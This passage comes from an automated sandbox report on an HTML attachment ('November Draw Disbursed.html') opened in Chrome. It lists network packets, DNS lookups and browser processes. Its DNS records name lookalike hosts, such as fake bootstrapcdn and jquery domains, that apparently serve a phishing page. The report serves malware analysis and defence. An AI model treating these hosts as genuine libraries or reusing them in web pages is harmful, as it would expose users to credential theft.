                                Nov 29, 2022 19:59:10.795406103 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.795454979 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.795700073 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.795718908 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.795739889 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.840694904 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.840900898 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.840935946 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.841027021 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.841114998 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.841135979 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.841164112 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.841223955 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.841255903 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.841402054 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.841486931 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.841532946 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.841893911 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.842000008 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.842005014 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.842065096 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.842122078 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.842139959 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.842787981 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.842866898 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.842880964 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.842916965 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.843008041 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.843671083 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.843848944 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.843925953 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.843928099 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.843950987 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.843998909 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.844558954 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.844710112 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.844772100 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.844784021 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.845551014 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.845628023 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.845634937 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.845654964 CET44349701188.114.96.3192.168.2.3

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 29, 2022 19:59:07.068732023 CET5784053192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:07.086155891 CET53578408.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:07.472232103 CET5799053192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:07.510745049 CET53579908.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:09.219088078 CET6062553192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:09.243546963 CET53606258.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:11.034914970 CET5295553192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:11.042839050 CET6058253192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:11.043695927 CET5713453192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:11.044045925 CET6205053192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:11.055634022 CET53529558.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:11.066426992 CET53571348.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:11.132739067 CET5604253192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:11.150424957 CET53560428.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:11.320646048 CET53605828.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:11.330082893 CET53620508.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:13.326191902 CET5563853192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:13.357458115 CET53556388.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:15.999356031 CET5384853192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:16.032098055 CET53538488.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:17.737325907 CET5869153192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:17.738293886 CET5330553192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:17.759807110 CET53586918.8.8.8192.168.2.3
                                Nov 29, 2022 19:59:27.923060894 CET6501753192.168.2.38.8.8.8
                                Nov 29, 2022 19:59:27.943217039 CET53650178.8.8.8192.168.2.3
                                Nov 29, 2022 20:00:11.191204071 CET6496753192.168.2.38.8.8.8
                                Nov 29, 2022 20:00:11.205492973 CET6082553192.168.2.38.8.8.8
                                Nov 29, 2022 20:00:11.208045006 CET53649678.8.8.8192.168.2.3
                                Nov 29, 2022 20:00:11.226298094 CET53608258.8.8.8192.168.2.3
                                Nov 29, 2022 20:01:11.264585972 CET5937453192.168.2.38.8.8.8
                                Nov 29, 2022 20:01:11.283909082 CET53593748.8.8.8192.168.2.3

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 29, 2022 19:59:07.068732023 CET192.168.2.38.8.8.80xbc6cStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:07.472232103 CET192.168.2.38.8.8.80x6bdcStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:09.219088078 CET192.168.2.38.8.8.80xeaStandard query (0)descansonline.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.034914970 CET192.168.2.38.8.8.80xffa0Standard query (0)maxcdn.bootstrapcdn.cloudA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.042839050 CET192.168.2.38.8.8.80x2e03Standard query (0)code.jquery.com.deA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.043695927 CET192.168.2.38.8.8.80xbb67Standard query (0)maxcdn.bootstrapcdn.restA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.044045925 CET192.168.2.38.8.8.80x773fStandard query (0)code.jquery.questA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.132739067 CET192.168.2.38.8.8.80xc87eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:13.326191902 CET192.168.2.38.8.8.80x5c60Standard query (0)i.postimg.ccA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:15.999356031 CET192.168.2.38.8.8.80xf708Standard query (0)i.postimg.ccA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.737325907 CET192.168.2.38.8.8.80x63d9Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.738293886 CET192.168.2.38.8.8.80x7d23Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:27.923060894 CET192.168.2.38.8.8.80xe01aStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 20:00:11.191204071 CET192.168.2.38.8.8.80x9160Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                Nov 29, 2022 20:00:11.205492973 CET192.168.2.38.8.8.80x6e69Standard query (0)maxcdn.bootstrapcdn.cloudA (IP address)IN (0x0001)false
                                Nov 29, 2022 20:01:11.264585972 CET192.168.2.38.8.8.80x628bStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 29, 2022 19:59:07.086155891 CET8.8.8.8192.168.2.30xbc6cNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                Nov 29, 2022 19:59:07.086155891 CET8.8.8.8192.168.2.30xbc6cNo error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:07.510745049 CET8.8.8.8192.168.2.30x6bdcNo error (0)accounts.google.com172.217.168.45A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:09.243546963 CET8.8.8.8192.168.2.30xeaNo error (0)descansonline.com188.114.96.3A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:09.243546963 CET8.8.8.8192.168.2.30xeaNo error (0)descansonline.com188.114.97.3A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.055634022 CET8.8.8.8192.168.2.30xffa0No error (0)maxcdn.bootstrapcdn.cloud68.65.123.205A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.066426992 CET8.8.8.8192.168.2.30xbb67No error (0)maxcdn.bootstrapcdn.rest172.67.188.128A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.066426992 CET8.8.8.8192.168.2.30xbb67No error (0)maxcdn.bootstrapcdn.rest104.21.40.223A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.150424957 CET8.8.8.8192.168.2.30xc87eNo error (0)www.google.com172.217.168.68A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.320646048 CET8.8.8.8192.168.2.30x2e03No error (0)code.jquery.com.de38.34.185.163A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:11.330082893 CET8.8.8.8192.168.2.30x773fNo error (0)code.jquery.quest38.34.185.163A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:13.357458115 CET8.8.8.8192.168.2.30x5c60No error (0)i.postimg.cc162.19.88.68A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:13.357458115 CET8.8.8.8192.168.2.30x5c60No error (0)i.postimg.cc162.19.88.69A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:16.032098055 CET8.8.8.8192.168.2.30xf708No error (0)i.postimg.cc162.19.88.68A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:16.032098055 CET8.8.8.8192.168.2.30xf708No error (0)i.postimg.cc162.19.88.69A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.759807110 CET8.8.8.8192.168.2.30x63d9No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                Nov 29, 2022 19:59:17.759807110 CET8.8.8.8192.168.2.30x63d9No error (0)d26p066pn2w0s0.cloudfront.net18.172.153.55A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.759807110 CET8.8.8.8192.168.2.30x63d9No error (0)d26p066pn2w0s0.cloudfront.net18.172.153.44A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.759807110 CET8.8.8.8192.168.2.30x63d9No error (0)d26p066pn2w0s0.cloudfront.net18.172.153.108A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.759807110 CET8.8.8.8192.168.2.30x63d9No error (0)d26p066pn2w0s0.cloudfront.net18.172.153.7A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:17.760951042 CET8.8.8.8192.168.2.30x7d23No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                Nov 29, 2022 19:59:17.760951042 CET8.8.8.8192.168.2.30x7d23No error (0)cs1025.wpc.upsiloncdn.net152.199.23.72A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:27.943217039 CET8.8.8.8192.168.2.30xe01aNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                Nov 29, 2022 19:59:27.943217039 CET8.8.8.8192.168.2.30xe01aNo error (0)d26p066pn2w0s0.cloudfront.net18.172.153.55A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:27.943217039 CET8.8.8.8192.168.2.30xe01aNo error (0)d26p066pn2w0s0.cloudfront.net18.172.153.44A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:27.943217039 CET8.8.8.8192.168.2.30xe01aNo error (0)d26p066pn2w0s0.cloudfront.net18.172.153.108A (IP address)IN (0x0001)false
                                Nov 29, 2022 19:59:27.943217039 CET8.8.8.8192.168.2.30xe01aNo error (0)d26p066pn2w0s0.cloudfront.net18.172.153.7A (IP address)IN (0x0001)false
                                Nov 29, 2022 20:00:11.208045006 CET8.8.8.8192.168.2.30x9160No error (0)www.google.com172.217.168.68A (IP address)IN (0x0001)false
                                Nov 29, 2022 20:00:11.226298094 CET8.8.8.8192.168.2.30x6e69No error (0)maxcdn.bootstrapcdn.cloud68.65.123.205A (IP address)IN (0x0001)false
                                Nov 29, 2022 20:01:11.283909082 CET8.8.8.8192.168.2.30x628bNo error (0)www.google.com172.217.168.68A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • clients2.google.com
                                • accounts.google.com
                                • descansonline.com
                                • maxcdn.bootstrapcdn.rest
                                • maxcdn.bootstrapcdn.cloud
                                • code.jquery.quest
                                • code.jquery.com.de
                                • i.postimg.cc
                                • logo.clearbit.com
                                • aadcdn.msauthimages.net

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:19:59:04
                                Start date:29/11/2022
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                Imagebase:0x7ff614650000
                                File size:2851656 bytes
                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:1
                                Start time:19:59:05
                                Start date:29/11/2022
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                Imagebase:0x7ff614650000
                                File size:2851656 bytes
                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:2
                                Start time:19:59:06
                                Start date:29/11/2022
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\November Draw Disbursed.html
                                Imagebase:0x7ff614650000
                                File size:2851656 bytes
                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                No disassembly